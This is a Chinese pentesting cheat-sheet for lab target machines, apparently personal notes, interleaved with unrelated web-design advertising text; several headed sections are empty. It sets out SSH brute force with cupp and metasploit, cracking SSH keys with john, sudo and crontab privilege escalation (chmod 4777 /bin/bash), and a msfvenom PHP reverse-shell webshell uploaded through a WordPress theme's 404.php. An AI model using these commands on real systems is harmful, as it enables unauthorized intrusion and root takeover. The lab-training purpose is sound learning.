重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
常用命令和工具:
创新互联专业为企业提供芜湖网站建设、芜湖做网站、芜湖网站设计、芜湖网站制作等企业网站建设、网页设计与制作、芜湖企业网站模板建站服务,10多年芜湖做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。
metasploit nmap sqlmap 中国蚁剑 冰蝎 dirsearch dirbuster 等常用工具就不在此介绍了
whatweb是kali自带的一个信息搜集工具
数据库密码hash解密工具john
cewl是kali自带的一个密码字典生成工具
针对wordpress站点可以使用wpscan先爆破该网站的用户名
通过已经wpscan扫描到的用户名和cewl生成的密码字典可以对目标进行爆破登录
漏洞搜索:
python交互式shell
RCE反弹shell的命令:
SSH服务相关命令
目标机器连接kali利用ssh将 exp下载到靶机上来
涉及到的提权方式:
**Tips:**拿到一个本地普通用户后,往往先要在该用户的家目录下搜索一番,以寻找有用的信息,提权的时候几乎所有的文件操作都在tmp目录下,因为其他目录往往没有权限,所以要时刻注意自己当前所在的目录。
suid之find提权
sudo提权系列:
sudo之teehee提权(方法不唯一)
teehee命令可以对文件进行写入操作,我们可以借此来提权
利用写入定时任务来提权
上面这条命令的意思是在/etc/crontab下写入定时计划,一分钟后由root用户给 /bin/bash 命令加权限(chmod 4777即开启suid和rwx权限),这样当我们再执行/bin/bash的时候就可以获得一个root权限的shell。除此之外还可以利用写入/etc/passwd文件添加一个有root权限的用户来提权。
sudo之nmap提权
我们使用 sudo -l命令发现我们可以不用密码就能以root权限运行nmap
然后我们可以利用nmap来提权
由于我们可以以root权限 运行nmap,然后我们让nmap去执行这个shell脚本,从而获取到一个root权限的shell。
脏牛提权
可以去百度申诉把之前WordPress搭建收录的页面删除
关于WordPress优化教程可以看下这篇文章
本人笔记,仅供参考
相关靶机:
链接:
提取码:qd32
渗透分析:
对于开启ssh服务的22端口的靶场优先考虑
1.暴力破解
2.私钥泄露
对于开放http服务的80端口或者其他端口的靶场优先考虑(特别注意大于1024的端口)
1.通过浏览器访问对应靶场http服务如地址:端口号
2.使用探测工具对http的目录进行探测,如dirb 地址:端口号
挖掘敏感信息:
使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息), 递归访问,力争把每一个dirb扫描到的目录页面都访问查看;
尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);
对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;
-- nikto -host靶场IP地址
特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;
登录服务器之后,我们需要做以下操作。
1、查看当前用户whoami .
2、id 查看当前用户的权限
3、查看根目录寻找flag文件
如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一
般情况下,flag文件只属于root用户和对应的用户组:
cat /etc/passwd查看所有用户的列装
cat /etc/group查看用户组
find / -user用户名查看属于某些用户的文件
/tmp查看缓冲文件目录
深入挖掘
通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务
cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。
如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹shell,然后netcat执行监听获取对应用户的权限。
如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。
万不得已的时候只能对ssh服务进行暴力破解。破解最后一个
用户名。破解工具如hydra、medusa等;
利用cupp创建字典
git clone
chmod +x cupp.py
./cupp.py -i以交互的方式创建字典
输入用户名然后一直回车到Do you want to add some random numbers at the end of words?输入yes其他全部no此时创建完成
之后推荐用metasploit破解ssh
在终端中输入
msfconsole
msf use auxiliary/scaner/ssh/ssh_ login(使用该模块)
set rhosts 192.168.56.103(确定ip地址)
set username 用户名(破解的用户名)
set pass_ file 用户名.txt(刚刚创建的字典)
set threads 5(输入线程)
Run(进攻)
此时破解出密码例如123
直接连接,如果出现问题可以重启msfconsole,启用该模块后
set rhosts 192.168.56.103 (连接远程主机)
set username hadi(用户名)
Set password 123(密码)
Run
界面简陋就使用python优化界面
Python -c “import pty;pty.spawn(‘/bin/bash’)”(优化界面)
此时可以把自己权限提升到root:
su - root
回到根目录ls打开flag文件
Ssh秘钥泄露
解密Ssh秘钥信息(以秘钥名id_isa举例)
Chmod 600 id_isa(赋予is_isa可读可写权限)
ssh2john id_isa isacrack (就是用ssh2john把秘钥里的东西转换成john可识别的)
Zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)
制作webshell
msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw /root/Desktop/shell.php
启动监听
msf use exploit/multi/handler
msf exploit(handler) set payload php/meterpreter/reverse_tcp
Weoshell
msf exploit(handler) set Ihost攻击机IP地址
msf exploit(handler) set lport 4444
msf exploit(handler) run
上传Webshell
使用找到的敏感信息登录系统后台,上传webshell。 执行
webshel(访问具有webshell的php页面)
获得反弹的shell
--
wordpress.上传点theme 404.php
执行: http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php